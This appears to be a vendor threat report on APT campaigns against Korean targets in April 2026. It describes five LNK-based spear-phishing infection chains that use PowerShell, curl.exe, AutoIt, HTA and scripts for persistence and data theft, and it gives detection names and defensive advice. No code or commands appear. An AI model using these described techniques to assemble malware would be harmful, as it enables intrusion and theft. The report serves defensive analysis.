April 2026 Threat Trend Report on APT Attacks (South Korea)
Overview
ahnLab utilized its infrastructure to monitor Advanced Persistent Threat (APT) attacks on targets in Korea. this report summarizes the classification, statistics, and features of each type of APT attacks identified in Korea during the month of April 2026.
Trends of APT Attacks in South Korea
most of the APT attacks identified in Korea were spread through spear phishing (phishing targeting specific individuals or groups). threat actors used email spoofing, malicious files, malicious attachments, and malicious links to trick users into executing the attacks.
Type A
This type is a malicious PowerShell (Windows Command Execution Script) command embedded in an LNK file that connects to an external URL to download additional files. It is characterized by copying and executing curl.exe with a different file name, and downloads both legitimate AutoIt programs and malicious AutoIt scripts and registers them in the Task Scheduler to ensure persistence. the malicious AutoIt script performed command execution, directory lookup, file upload, and file download functions.
Type B
A PowerShell script inside LNK extracts HEX Data based on specific markers (NCFO, BCFO, etc.) to restore and execute a legitimate decoy document, a legitimate AutoIt program, and a malicious AutoIt script. it tricked users with legitimate documents while executing malicious scripts in the Path C:\ProgramData and registered a Task Scheduler disguised as a OneDrive update. the infected system received and executed the threat actor’s commands through a PubNub channel created based on the computer name and username, and exfiltrated the results in Base64 encoding.
Type C
this type downloads and executes a malicious HTA (HTML Application, HTA script file) file in the %TEMP% folder using curl.exe, a Windows built-in tool. the malicious HTA files were distributed through Github repositories or Google Drive operated by the threat actor, which created a decoy file and a downloader with the file name sys.dll. the downloader loaded Infostealer (Information Theft malware), Keylogger (Keystroke Logging malware), and backdoor malware into memory that leaks system information, key file lists, virtual asset-related information, etc.
Type D
The PowerShell code included in LNK was executed to create and execute a script that generated Base64-encoded Data in the %temp% path. It then accessed a GitHub repository, downloaded and executed a decoy file and additional malicious scripts, and created a task scheduler disguised as a browser update. As a result, it exfiltrated system information and distributed XenoRAT (Remote Control Malware) type malware.
Type E
XML, VBS, and PowerShell scripts inside LNK generate Data and register a Task Scheduler to ensure persistence. PowerShell scripts executed through VBS transmitted infected system information to the outside world and then downloaded and executed additional BAT files. The BAT file executed a malicious Python script inside a compressed file, which ultimately executed a backdoor that allowed remote command execution and file control.
Type Unknown
we have seen cases that were distributed via spear phishing but do not fit into any of the previously described types.
AhnLab Response Overview
ahnLab’s products have detected related malware with various detection names, including Backdoor/Win.Agent.C5882829, Infostealer/Win.Agent.C5882827, Trojan/LNK.Agent, Trojan/PS.Agent, Trojan/HTA.Agent, Trojan/VBS.Agent, Trojan/XML.Task, etc. however, even recently detected activity may have diagnosed related malware in the past, and there may be undiagnosed variants that have not been identified.
Conclusion
this APT attack in Korea started with Spear Phishing emails disguised as work-related content and used various types of malware, including LNK files, PowerShell, curl.exe, AutoIt, HTA, VBS, BAT, and Python. successful attacks may result in backdoor installation, Infostealer behavior, system information leakage, and System Control Theft of the infected system. it is recommended to avoid opening files from unknown sources, thoroughly check the sender, and keep programs including OS and Internet browsers with the latest patches and V3 latest version.
